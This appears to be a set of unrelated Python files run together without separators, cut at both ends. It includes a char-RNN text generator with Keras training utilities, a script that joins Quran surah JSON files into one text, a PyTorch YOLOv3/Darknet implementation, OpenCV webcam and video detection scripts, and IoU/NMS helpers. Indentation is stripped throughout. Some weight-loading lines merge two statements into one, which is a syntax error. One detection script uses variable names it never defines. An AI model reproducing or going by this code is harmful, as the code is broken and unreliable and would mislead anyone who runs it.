char = train_chars.int2char[c]
samples.append(char)
# if i == n_samples - 1 and char != " " and char != ".":
if i == n_samples - 1 and char != " ":
# while char != "." and char != " ":
while char != " ":
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_chars.vocab))
char = train_chars.int2char[c]
samples.append(cha
"""
# print(x.shape)
# print(x.shape)
# pred = model.predict(x)[0][0]
# print(pred)
# print(logits_to_text(pred))
# print(model.predict_classes(x))
print(generate_code(model, x, n_chars=500))
from models import rnn_model
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
from utils import text_to_sequence, sequence_to_text, get_batches, read_data, get_data, get_data_length
import numpy as np
import os
text, int2char, char2int = read_data(load=False)
batch_size = 256
test_size = 0.2
n_steps = 500
n_chars = len(text)
vocab_size = len(set(text))
print("n_steps:", n_steps)
print("n_chars:", n_chars)
print("vocab_size:", vocab_size)
encoded = np.array(text_to_sequence(text))
n_train = int(n_chars * (1-test_size))
X_train = encoded[:n_train]
X_test = encoded[n_train:]
train = get_batches(X_train, batch_size, n_steps, output_format="many", vocab_size=vocab_size+1)
test = get_batches(X_test, batch_size, n_steps, output_format="many", vocab_size=vocab_size+1)
for i, t in enumerate(train):
if i == 2:
break
print(t[0])
print(np.array(t[0]).shape)
# print(test.shape)
# # DIM = 28
# model = rnn_model(input_dim=n_steps, output_dim=vocab_size+1, cell=LSTM, num_layers=3, units=200, dropout=0.2, batch_normalization=True)
# model.summary()
# model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["accuracy"])
# if not os.path.isdir("results"):
# os.mkdir("results")
# checkpointer = ModelCheckpoint("results/rnn_{val_loss:.1f}", save_best_only=True, verbose=1)
# train_steps_per_epoch = get_data_length(X_train, n_steps, output_format="one") // batch_size
# test_steps_per_epoch = get_data_length(X_test, n_steps, output_format="one") // batch_size
# print("train_steps_per_epoch:", train_steps_per_epoch)
# print("test_steps_per_epoch:", test_steps_per_epoch)
# model.load_weights("results/rnn_3.2")
# model.fit_generator(train,
# epochs=30,
# validation_data=(test),
# steps_per_epoch=train_steps_per_epoch,
# validation_steps=test_steps_per_epoch,
# callbacks=[checkpointer],
# verbose=1)
# model.save("results/rnn_final.model")
import numpy as np
import tqdm
import pickle
from keras.utils import to_categorical
int2char, char2int = None, None
def read_data(load=False):
global int2char
global char2int
with open("E:\\datasets\\text\\my_python_code.py") as f:
text = f.read()
unique_chars = set(text)
if not load:
int2char = { i: c for i, c in enumerate(unique_chars, start=1) }
char2int = { c: i for i, c in enumerate(unique_chars, start=1) }
pickle.dump(int2char, open("results/int2char.pickle", "wb"))
pickle.dump(char2int, open("results/char2int.pickle", "wb"))
else:
int2char = pickle.load(open("results/int2char.pickle", "rb"))
char2int = pickle.load(open("results/char2int.pickle", "rb"))
return text, int2char, char2int
def get_batches(arr, batch_size, n_steps, vocab_size, output_format="many"):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
if output_format == "many":
while True:
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x.reshape(1, x.shape[0], x.shape[1]), y.reshape(1, y.shape[0], y.shape[1])
elif output_format == "one":
while True:
# X = np.zeros((arr.shape[1], n_steps))
# y = np.zeros((arr.shape[1], 1))
# for i in range(n_samples-n_steps):
# X[i] = np.array([ p.replace(",", "") if isinstance(p, str) else p for p in df.Price.iloc[i: i+n_steps] ])
# price = df.Price.iloc[i + n_steps]
# y[i] = price.replace(",", "") if isinstance(price, str) else price
for n in range(arr.shape[1] - n_steps-1):
x = arr[:, n: n+n_steps]
y = arr[:, n+n_steps+1]
# print("y.shape:", y.shape)
y = to_categorical(y, num_classes=vocab_size)
# print("y.shape after categorical:", y.shape)
y = np.expand_dims(y, axis=0)
yield x.reshape(1, x.shape[0], x.shape[1]), y
def get_data(arr, batch_size, n_steps, vocab_size):
# n_samples = len(arr) // n_seq
# X = np.zeros((n_seq, n_samples))
# Y = np.zeros((n_seq, n_samples))
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
# for index, i in enumerate(range(0, n_samples*n_seq, n_seq)):
# x = arr[i:i+n_seq]
# y = arr[i+1:i+n_seq+1]
# if len(x) != n_seq or len(y) != n_seq:
# break
# X[:, index] = x
# Y[:, index] = y
X = np.zeros((batch_size, arr.shape[1]))
Y = np.zeros((batch_size, vocab_size))
for n in range(arr.shape[1] - n_steps-1):
x = arr[:, n: n+n_steps]
y = arr[:, n+n_steps+1]
# print("y.shape:", y.shape)
y = to_categorical(y, num_classes=vocab_size)
# print("y.shape after categorical:", y.shape)
# y = np.expand_dims(y, axis=1)
X[:, n: n+n_steps] = x
Y[n] = y
# yield x.reshape(1, x.shape[0], x.shape[1]), y
return np.expand_dims(X, axis=1), Y
# return n_samples
# return X.T.reshape(1, X.shape[1], X.shape[0]), Y.T.reshape(1, Y.shape[1], Y.shape[0])
def get_data_length(arr, n_seq, output_format="many"):
if output_format == "many":
return len(arr) // n_seq
elif output_format == "one":
return len(arr) - n_seq
def text_to_sequence(text):
global char2int
return [ char2int[c] for c in text ]
def sequence_to_text(sequence):
global int2char
return ''.join([ int2char[i] for i in sequence ])
import json
import os
import glob
CUR_DIR = os.getcwd()
text = ""
# for filename in os.listdir(os.path.join(CUR_DIR, "data", "json")):
surat = [ f"surah_{i}.json" for i in range(1, 115) ]
for filename in surat:
filename = os.path.join(CUR_DIR, "data", "json", filename)
file = json.load(open(filename, encoding="utf8"))
content = file['verse']
for verse_id, ayah in content.items():
text += f"{ayah}."
n_ayah = len(text.split("."))
n_words = len(text.split(" "))
n_chars = len(text)
print(f"Number of ayat: {n_ayah}, Number of words: {n_words}, Number of chars: {n_chars}")
with open("quran.txt", "w", encoding="utf8") as quran_file:
print(text, file=quran_file)
import torch
import torch.nn as nn
import numpy as np
# let us run this cell only if CUDA is available
# We will use torch.device objects to move tensors in and out of GPU
if torch.cuda.is_available():
x = torch.randn(1)
device = torch.device("cuda") # a CUDA device object
y = torch.ones_like(x, device=device) # directly create a tensor on GPU
x = x.to(device) # or just use strings .to("cuda")
z = x + y
print(z)
print(z.to("cpu", torch.double)) # .to can also change dtype together!
class YoloLayer(nn.Module):
def __init__(self, anchor_mask=[], num_classes=0, anchors=[], num_anchors=1):
super(YoloLayer, self).__init__()
self.anchor_mask = anchor_mask
self.num_classes = num_classes
self.anchors = anchors
self.num_anchors = num_anchors
self.anchor_step = len(anchors)/num_anchors
self.coord_scale = 1
self.noobject_scale = 1
self.object_scale = 5
self.class_scale = 1
self.thresh = 0.6
self.stride = 32
self.seen = 0
def forward(self, output, nms_thresh):
self.thresh = nms_thresh
masked_anchors = []
for m in self.anchor_mask:
masked_anchors += self.anchors[m*self.anchor_step:(m+1)*self.anchor_step]
masked_anchors = [anchor/self.stride for anchor in masked_anchors]
boxes = get_region_boxes(output.data, self.thresh, self.num_classes, masked_anchors, len(self.anchor_mask))
return boxes
class Upsample(nn.Module):
def __init__(self, stride=2):
super(Upsample, self).__init__()
self.stride = stride
def forward(self, x):
stride = self.stride
assert(x.data.dim() == 4)
B = x.data.size(0)
C = x.data.size(1)
H = x.data.size(2)
W = x.data.size(3)
ws = stride
hs = stride
x = x.view(B, C, H, 1, W, 1).expand(B, C, H, stride, W, stride).contiguous().view(B, C, H*stride, W*stride)
return x
#for route and shortcut
class EmptyModule(nn.Module):
def __init__(self):
super(EmptyModule, self).__init__()
def forward(self, x):
return x
# support route shortcut
class Darknet(nn.Module):
def __init__(self, cfgfile):
super(Darknet, self).__init__()
self.blocks = parse_cfg(cfgfile)
self.models = self.create_network(self.blocks) # merge conv, bn,leaky
self.loss = self.models[len(self.models)-1]
self.width = int(self.blocks[0]['width'])
self.height = int(self.blocks[0]['height'])
self.header = torch.IntTensor([0,0,0,0])
self.seen = 0
def forward(self, x, nms_thresh):
ind = -2
self.loss = None
outputs = dict()
out_boxes = []
for block in self.blocks:
ind = ind + 1
if block['type'] == 'net':
continue
elif block['type'] in ['convolutional', 'upsample']:
x = self.models[ind](x)
outputs[ind] = x
elif block['type'] == 'route':
layers = block['layers'].split(',')
layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
if len(layers) == 1:
x = outputs[layers[0]]
outputs[ind] = x
elif len(layers) == 2:
x1 = outputs[layers[0]]
x2 = outputs[layers[1]]
x = torch.cat((x1,x2),1)
outputs[ind] = x
elif block['type'] == 'shortcut':
from_layer = int(block['from'])
activation = block['activation']
from_layer = from_layer if from_layer > 0 else from_layer + ind
x1 = outputs[from_layer]
x2 = outputs[ind-1]
x = x1 + x2
outputs[ind] = x
elif block['type'] == 'yolo':
boxes = self.models[ind](x, nms_thresh)
out_boxes.append(boxes)
else:
print('unknown type %s' % (block['type']))
return out_boxes
def print_network(self):
print_cfg(self.blocks)
def create_network(self, blocks):
models = nn.ModuleList()
prev_filters = 3
out_filters =[]
prev_stride = 1
out_strides = []
conv_id = 0
for block in blocks:
if block['type'] == 'net':
prev_filters = int(block['channels'])
continue
elif block['type'] == 'convolutional':
conv_id = conv_id + 1
batch_normalize = int(block['batch_normalize'])
filters = int(block['filters'])
kernel_size = int(block['size'])
stride = int(block['stride'])
is_pad = int(block['pad'])
pad = (kernel_size-1)//2 if is_pad else 0
activation = block['activation']
model = nn.Sequential()
if batch_normalize:
model.add_module('conv{0}'.format(conv_id), nn.Conv2d(prev_filters, filters, kernel_size, stride, pad, bias=False))
model.add_module('bn{0}'.format(conv_id), nn.BatchNorm2d(filters))
else:
model.add_module('conv{0}'.format(conv_id), nn.Conv2d(prev_filters, filters, kernel_size, stride, pad))
if activation == 'leaky':
model.add_module('leaky{0}'.format(conv_id), nn.LeakyReLU(0.1, inplace=True))
prev_filters = filters
out_filters.append(prev_filters)
prev_stride = stride * prev_stride
out_strides.append(prev_stride)
models.append(model)
elif block['type'] == 'upsample':
stride = int(block['stride'])
out_filters.append(prev_filters)
prev_stride = prev_stride // stride
out_strides.append(prev_stride)
models.append(Upsample(stride))
elif block['type'] == 'route':
layers = block['layers'].split(',')
ind = len(models)
layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
if len(layers) == 1:
prev_filters = out_filters[layers[0]]
prev_stride = out_strides[layers[0]]
elif len(layers) == 2:
assert(layers[0] == ind - 1)
prev_filters = out_filters[layers[0]] + out_filters[layers[1]]
prev_stride = out_strides[layers[0]]
out_filters.append(prev_filters)
out_strides.append(prev_stride)
models.append(EmptyModule())
elif block['type'] == 'shortcut':
ind = len(models)
prev_filters = out_filters[ind-1]
out_filters.append(prev_filters)
prev_stride = out_strides[ind-1]
out_strides.append(prev_stride)
models.append(EmptyModule())
elif block['type'] == 'yolo':
yolo_layer = YoloLayer()
anchors = block['anchors'].split(',')
anchor_mask = block['mask'].split(',')
yolo_layer.anchor_mask = [int(i) for i in anchor_mask]
yolo_layer.anchors = [float(i) for i in anchors]
yolo_layer.num_classes = int(block['classes'])
yolo_layer.num_anchors = int(block['num'])
yolo_layer.anchor_step = len(yolo_layer.anchors)//yolo_layer.num_anchors
yolo_layer.stride = prev_stride
out_filters.append(prev_filters)
out_strides.append(prev_stride)
models.append(yolo_layer)
else:
print('unknown type %s' % (block['type']))
return models
def load_weights(self, weightfile):
print()
fp = open(weightfile, 'rb')
header = np.fromfile(fp, count=5, dtype=np.int32)
self.header = torch.from_numpy(header)
self.seen = self.header[3]
buf = np.fromfile(fp, dtype = np.float32)
fp.close()
start = 0
ind = -2
counter = 3
for block in self.blocks:
if start >= buf.size:
break
ind = ind + 1
if block['type'] == 'net':
continue
elif block['type'] == 'convolutional':
model = self.models[ind]
batch_normalize = int(block['batch_normalize'])
if batch_normalize:
start = load_conv_bn(buf, start, model[0], model[1])
else:
start = load_conv(buf, start, model[0])
elif block['type'] == 'upsample':
pass
elif block['type'] == 'route':
pass
elif block['type'] == 'shortcut':
pass
elif block['type'] == 'yolo':
pass
else:
print('unknown type %s' % (block['type']))
percent_comp = (counter / len(self.blocks)) * 100
print('Loading weights. Please Wait...{:.2f}% Complete'.format(percent_comp), end = '\r', flush = True)
counter += 1
def convert2cpu(gpu_matrix):
return torch.FloatTensor(gpu_matrix.size()).copy_(gpu_matrix)
def convert2cpu_long(gpu_matrix):
return torch.LongTensor(gpu_matrix.size()).copy_(gpu_matrix)
def get_region_boxes(output, conf_thresh, num_classes, anchors, num_anchors, only_objectness = 1, validation = False):
anchor_step = len(anchors)//num_anchors
if output.dim() == 3:
output = output.unsqueeze(0)
batch = output.size(0)
assert(output.size(1) == (5+num_classes)*num_anchors)
h = output.size(2)
w = output.size(3)
all_boxes = []
output = output.view(batch*num_anchors, 5+num_classes, h*w).transpose(0,1).contiguous().view(5+num_classes, batch*num_anchors*h*w)
grid_x = torch.linspace(0, w-1, w).repeat(h,1).repeat(batch*num_anchors, 1, 1).view(batch*num_anchors*h*w).type_as(output) #cuda()
grid_y = torch.linspace(0, h-1, h).repeat(w,1).t().repeat(batch*num_anchors, 1, 1).view(batch*num_anchors*h*w).type_as(output) #cuda()
xs = torch.sigmoid(output[0]) + grid_x
ys = torch.sigmoid(output[1]) + grid_y
anchor_w = torch.Tensor(anchors).view(num_anchors, anchor_step).index_select(1, torch.LongTensor([0]))
anchor_h = torch.Tensor(anchors).view(num_anchors, anchor_step).index_select(1, torch.LongTensor([1]))
anchor_w = anchor_w.repeat(batch, 1).repeat(1, 1, h*w).view(batch*num_anchors*h*w).type_as(output) #cuda()
anchor_h = anchor_h.repeat(batch, 1).repeat(1, 1, h*w).view(batch*num_anchors*h*w).type_as(output) #cuda()
ws = torch.exp(output[2]) * anchor_w
hs = torch.exp(output[3]) * anchor_h
det_confs = torch.sigmoid(output[4])
cls_confs = torch.nn.Softmax(dim=1)(output[5:5+num_classes].transpose(0,1)).detach()
cls_max_confs, cls_max_ids = torch.max(cls_confs, 1)
cls_max_confs = cls_max_confs.view(-1)
cls_max_ids = cls_max_ids.view(-1)
sz_hw = h*w
sz_hwa = sz_hw*num_anchors
det_confs = convert2cpu(det_confs)
cls_max_confs = convert2cpu(cls_max_confs)
cls_max_ids = convert2cpu_long(cls_max_ids)
xs = convert2cpu(xs)
ys = convert2cpu(ys)
ws = convert2cpu(ws)
hs = convert2cpu(hs)
if validation:
cls_confs = convert2cpu(cls_confs.view(-1, num_classes))
for b in range(batch):
boxes = []
for cy in range(h):
for cx in range(w):
for i in range(num_anchors):
ind = b*sz_hwa + i*sz_hw + cy*w + cx
det_conf = det_confs[ind]
if only_objectness:
conf = det_confs[ind]
else:
conf = det_confs[ind] * cls_max_confs[ind]
if conf > conf_thresh:
bcx = xs[ind]
bcy = ys[ind]
bw = ws[ind]
bh = hs[ind]
cls_max_conf = cls_max_confs[ind]
cls_max_id = cls_max_ids[ind]
box = [bcx/w, bcy/h, bw/w, bh/h, det_conf, cls_max_conf, cls_max_id]
if (not only_objectness) and validation:
for c in range(num_classes):
tmp_conf = cls_confs[ind][c]
if c != cls_max_id and det_confs[ind]*tmp_conf > conf_thresh:
box.append(tmp_conf)
box.append(c)
boxes.append(box)
all_boxes.append(boxes)
return all_boxes
def parse_cfg(cfgfile):
blocks = []
fp = open(cfgfile, 'r')
block = None
line = fp.readline()
while line != '':
line = line.rstrip()
if line == '' or line[0] == '#':
line = fp.readline()
continue
elif line[0] == '[':
if block:
blocks.append(block)
block = dict()
block['type'] = line.lstrip('[').rstrip(']')
# set default value
if block['type'] == 'convolutional':
block['batch_normalize'] = 0
else:
key,value = line.split('=')
key = key.strip()
if key == 'type':
key = '_type'
value = value.strip()
block[key] = value
line = fp.readline()
if block:
blocks.append(block)
fp.close()
return blocks
def print_cfg(blocks):
print('layer filters size input output')
prev_width = 416
prev_height = 416
prev_filters = 3
out_filters =[]
out_widths =[]
out_heights =[]
ind = -2
for block in blocks:
ind = ind + 1
if block['type'] == 'net':
prev_width = int(block['width'])
prev_height = int(block['height'])
continue
elif block['type'] == 'convolutional':
filters = int(block['filters'])
kernel_size = int(block['size'])
stride = int(block['stride'])
is_pad = int(block['pad'])
pad = (kernel_size-1)//2 if is_pad else 0
width = (prev_width + 2*pad - kernel_size)//stride + 1
height = (prev_height + 2*pad - kernel_size)//stride + 1
print('%5d %-6s %4d %d x %d / %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'conv', filters, kernel_size, kernel_size, stride, prev_width, prev_height, prev_filters, width, height, filters))
prev_width = width
prev_height = height
prev_filters = filters
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'upsample':
stride = int(block['stride'])
filters = prev_filters
width = prev_width*stride
height = prev_height*stride
print('%5d %-6s * %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'upsample', stride, prev_width, prev_height, prev_filters, width, height, filters))
prev_width = width
prev_height = height
prev_filters = filters
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'route':
layers = block['layers'].split(',')
layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
if len(layers) == 1:
print('%5d %-6s %d' % (ind, 'route', layers[0]))
prev_width = out_widths[layers[0]]
prev_height = out_heights[layers[0]]
prev_filters = out_filters[layers[0]]
elif len(layers) == 2:
print('%5d %-6s %d %d' % (ind, 'route', layers[0], layers[1]))
prev_width = out_widths[layers[0]]
prev_height = out_heights[layers[0]]
assert(prev_width == out_widths[layers[1]])
assert(prev_height == out_heights[layers[1]])
prev_filters = out_filters[layers[0]] + out_filters[layers[1]]
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] in ['region', 'yolo']:
print('%5d %-6s' % (ind, 'detection'))
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'shortcut':
from_id = int(block['from'])
from_id = from_id if from_id > 0 else from_id+ind
print('%5d %-6s %d' % (ind, 'shortcut', from_id))
prev_width = out_widths[from_id]
prev_height = out_heights[from_id]
prev_filters = out_filters[from_id]
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
else:
print('unknown type %s' % (block['type']))
def load_conv(buf, start, conv_model):
num_w = conv_model.weight.numel()
num_b = conv_model.bias.numel()
conv_model.bias.data.copy_(torch.from_numpy(buf[start:start+num_b])) start = start + num_b
conv_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_w]).view_as(conv_model.weight.data)) start = start + num_w
return start
def load_conv_bn(buf, start, conv_model, bn_model):
num_w = conv_model.weight.numel()
num_b = bn_model.bias.numel()
bn_model.bias.data.copy_(torch.from_numpy(buf[start:start+num_b])) start = start + num_b
bn_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_b])) start = start + num_b
bn_model.running_mean.copy_(torch.from_numpy(buf[start:start+num_b])) start = start + num_b
bn_model.running_var.copy_(torch.from_numpy(buf[start:start+num_b])) start = start + num_b
conv_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_w]).view_as(conv_model.weight.data)) start = start + num_w
return start
import cv2
import numpy as np
import time
CONFIDENCE = 0.5
SCORE_THRESHOLD = 0.5
IOU_THRESHOLD = 0.5
config_path = "cfg/yolov3.cfg"
weights_path = "weights/yolov3.weights"
font_scale = 1
thickness = 1
LABELS = open("data/coco.names").read().strip().split("\n")
COLORS = np.random.randint(0, 255, size=(len(LABELS), 3), dtype="uint8")
net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
ln = net.getLayerNames()
ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
cap = cv2.VideoCapture(0)
while True:
_, image = cap.read()
h, w = image.shape[:2]
blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
net.setInput(blob)
start = time.perf_counter()
layer_outputs = net.forward(ln)
time_took = time.perf_counter() - start
print("Time took:", time_took)
boxes, confidences, class_ids = [], [], []
# loop over each of the layer outputs
for output in layer_outputs:
# loop over each of the object detections
for detection in output:
# extract the class id (label) and confidence (as a probability) of
# the current object detection
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
# discard weak predictions by ensuring the detected
# probability is greater than the minimum probability
if confidence > CONFIDENCE:
# scale the bounding box coordinates back relative to the
# size of the image, keeping in mind that YOLO actually
# returns the center (x, y)-coordinates of the bounding
# box followed by the boxes' width and height
box = detection[:4] * np.array([w, h, w, h])
(centerX, centerY, width, height) = box.astype("int")
# use the center (x, y)-coordinates to derive the top and
# and left corner of the bounding box
x = int(centerX - (width / 2))
y = int(centerY - (height / 2))
# update our list of bounding box coordinates, confidences,
# and class IDs
boxes.append([x, y, int(width), int(height)])
confidences.append(float(confidence))
class_ids.append(class_id)
# perform the non maximum suppression given the scores defined before
idxs = cv2.dnn.NMSBoxes(boxes, confidences, SCORE_THRESHOLD, IOU_THRESHOLD)
font_scale = 1
thickness = 1
# ensure at least one detection exists
if len(idxs) > 0:
# loop over the indexes we are keeping
for i in idxs.flatten():
# extract the bounding box coordinates
x, y = boxes[i][0], boxes[i][1]
w, h = boxes[i][2], boxes[i][3]
# draw a bounding box rectangle and label on the image
color = [int(c) for c in colors[class_ids[i]]]
cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=thickness)
text = f"{labels[class_ids[i]]}: {confidences[i]:.2f}"
# calculate text width & height to draw the transparent boxes as background of the text
(text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=font_scale, thickness=thickness)[0]
text_offset_x = x
text_offset_y = y - 5
box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))
overlay = image.copy()
cv2.rectangle(overlay, box_coords[0], box_coords[1], color=color, thickness=cv2.FILLED)
# add opacity (transparency to the box)
image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)
# now put the text (label: confidence %)
cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,
fontScale=font_scale, color=(0, 0, 0), thickness=thickness)
cv2.imshow("image", image)
if ord("q") == cv2.waitKey(1):
break
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import time
import sys
CONFIDENCE = 0.5
SCORE_THRESHOLD = 0.5
IOU_THRESHOLD = 0.5
config_path = "cfg/yolov3.cfg"
weights_path = "weights/yolov3.weights"
font_scale = 1
thickness = 1
labels = open("data/coco.names").read().strip().split("\n")
colors = np.random.randint(0, 255, size=(len(labels), 3), dtype="uint8")
net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
ln = net.getLayerNames()
ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
# read the file from the command line
video_file = sys.argv[1]
cap = cv2.VideoCapture(video_file)
_, image = cap.read()
h, w = image.shape[:2]
fourcc = cv2.VideoWriter_fourcc(*"XVID")
out = cv2.VideoWriter("output.avi", fourcc, 20.0, (w, h))
while True:
_, image = cap.read()
h, w = image.shape[:2]
blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
net.setInput(blob)
start = time.perf_counter()
layer_outputs = net.forward(ln)
time_took = time.perf_counter() - start
print("Time took:", time_took)
boxes, confidences, class_ids = [], [], []
# loop over each of the layer outputs
for output in layer_outputs:
# loop over each of the object detections
for detection in output:
# extract the class id (label) and confidence (as a probability) of
# the current object detection
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
# discard weak predictions by ensuring the detected
# probability is greater than the minimum probability
if confidence > CONFIDENCE:
# scale the bounding box coordinates back relative to the
# size of the image, keeping in mind that YOLO actually
# returns the center (x, y)-coordinates of the bounding
# box followed by the boxes' width and height
box = detection[:4] * np.array([w, h, w, h])
(centerX, centerY, width, height) = box.astype("int")
# use the center (x, y)-coordinates to derive the top and
# and left corner of the bounding box
x = int(centerX - (width / 2))
y = int(centerY - (height / 2))
# update our list of bounding box coordinates, confidences,
# and class IDs
boxes.append([x, y, int(width), int(height)])
confidences.append(float(confidence))
class_ids.append(class_id)
# perform the non maximum suppression given the scores defined before
idxs = cv2.dnn.NMSBoxes(boxes, confidences, SCORE_THRESHOLD, IOU_THRESHOLD)
font_scale = 1
thickness = 1
# ensure at least one detection exists
if len(idxs) > 0:
# loop over the indexes we are keeping
for i in idxs.flatten():
# extract the bounding box coordinates
x, y = boxes[i][0], boxes[i][1]
w, h = boxes[i][2], boxes[i][3]
# draw a bounding box rectangle and label on the image
color = [int(c) for c in colors[class_ids[i]]]
cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=thickness)
text = f"{labels[class_ids[i]]}: {confidences[i]:.2f}"
# calculate text width & height to draw the transparent boxes as background of the text
(text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=font_scale, thickness=thickness)[0]
text_offset_x = x
text_offset_y = y - 5
box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))
overlay = image.copy()
cv2.rectangle(overlay, box_coords[0], box_coords[1], color=color, thickness=cv2.FILLED)
# add opacity (transparency to the box)
image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)
# now put the text (label: confidence %)
cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,
fontScale=font_scale, color=(0, 0, 0), thickness=thickness)
out.write(image)
cv2.imshow("image", image)
if ord("q") == cv2.waitKey(1):
break
cap.release()
cv2.destroyAllWindows()
import time
import torch
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
def boxes_iou(box1, box2):
"""
Returns the IOU between box1 and box2 (i.e intersection area divided by union area)
"""
# Get the Width and Height of each bounding box
width_box1 = box1[2]
height_box1 = box1[3]
width_box2 = box2[2]
height_box2 = box2[3]
# Calculate the area of the each bounding box
area_box1 = width_box1 * height_box1
area_box2 = width_box2 * height_box2
# Find the vertical edges of the union of the two bounding boxes
mx = min(box1[0] - width_box1/2.0, box2[0] - width_box2/2.0)
Mx = max(box1[0] + width_box1/2.0, box2[0] + width_box2/2.0)
# Calculate the width of the union of the two bounding boxes
union_width = Mx - mx
# Find the horizontal edges of the union of the two bounding boxes
my = min(box1[1] - height_box1/2.0, box2[1] - height_box2/2.0)
My = max(box1[1] + height_box1/2.0, box2[1] + height_box2/2.0)
# Calculate the height of the union of the two bounding boxes
union_height = My - my
# Calculate the width and height of the area of intersection of the two bounding boxes
intersection_width = width_box1 + width_box2 - union_width
intersection_height = height_box1 + height_box2 - union_height
# If the the boxes don't overlap then their IOU is zero
if intersection_width <= 0 or intersection_height <= 0:
return 0.0
# Calculate the area of intersection of the two bounding boxes
intersection_area = intersection_width * intersection_height
# Calculate the area of the union of the two bounding boxes
union_area = area_box1 + area_box2 - intersection_area
# Calculate the IOU
iou = intersection_area/union_area
return iou
def nms(boxes, iou_thresh):
"""
Performs Non maximal suppression technique to boxes using iou_thresh threshold
"""
# print(boxes.shape)
# If there are no bounding boxes do nothing
if len(boxes) == 0:
return boxes
# Create a PyTorch Tensor to keep track of the detection confidence
# of each predicted bounding box
det_confs = torch.zeros(len(boxes))
# Get the detection confidence of each predicted bounding box
for i in range(len(boxes)):
det_confs[i] = boxes[i][4]
# Sort the indices of the bounding boxes by detection confidence value in descending order.
# We ignore the first returned element since we are only interested in the sorted indices
_,sortIds = torch.sort(det_confs, descending = True)
# Create an empty list to hold the best bounding boxes after
# Non-Maximal Suppression (NMS) is performed
best_boxes = []
# Perform Non-Maximal Suppression
for i in range(len(boxes)):
# Get the bounding box with the highest detection confidence first
box_i = boxes[sortIds[i]]
# Check that the detection confidence is not zero
if box_i[4] > 0:
# Save the bounding box
best_boxes.append(box_i)
# Go through the rest of the bounding boxes in the list and calculate their IOU with
# respect to the previous selected box_i.
for j in range(i + 1, len(boxes)):
box_j = boxes[sortIds[j]]
# If the IOU of box_i and box_j is higher than the given IOU threshold set
# box_j's detection confidence to zero.
if boxes_iou(box_i, box_j) > iou_thresh:
box_j[4] = 0
return best_boxes
def detect_objects(model, img, iou_thresh, nms_thresh):
# Start the time. This is done to calculate how long the detection takes.
start = time.time()
# Set the model to evaluation mode.
model.eval()
# Convert the image from a NumPy ndarray to a PyTorch Tensor of the correct shape.
# The image is transposed, then converted to a FloatTensor of dtype float32, then
# Normalized to values between 0 and 1, and finally unsqueezed to have the correct
# shape of 1 x 3 x 416 x 416
img = torch.from_numpy(img.transpose(2,0,1)).float().div(255.0).unsqueeze(0)
# Feed the image to the neural network with the corresponding NMS threshold.
# The first step in NMS is to remove all bounding boxes that have a very low
# probability of detection. All predicted bounding boxes with a value less than
# the given NMS threshold will be removed.
list_boxes = model(img, nms_thresh)
# Make a new list with all the bounding boxes returned by the neural network
boxes = list_boxes[0][0] + list_boxes[1][0] + list_boxes[2][0]
# Perform the second step of NMS on the bounding boxes returned by the neural network.
# In this step, we only keep the best bounding boxes by eliminating all the bounding boxes
# whose IOU value is higher than the given IOU threshold
boxes = nms(boxes, iou_thresh)
# Stop the time.
finish = time.time()
# Print the time it took to detect objects
print('\n\nIt took {:.3f}'.format(finish - start), 'seconds to detect the objects in the image.\n')
# Print the number of objects detected
print('Number of Objects Detected:', len(boxes), '\n')
return boxes
def load_class_names(namesfile):
# Create an empty list to hold the object classes
class_names = []
# Open the file containing the COCO object classes in read-only mode
with open(namesfile, 'r') as fp:
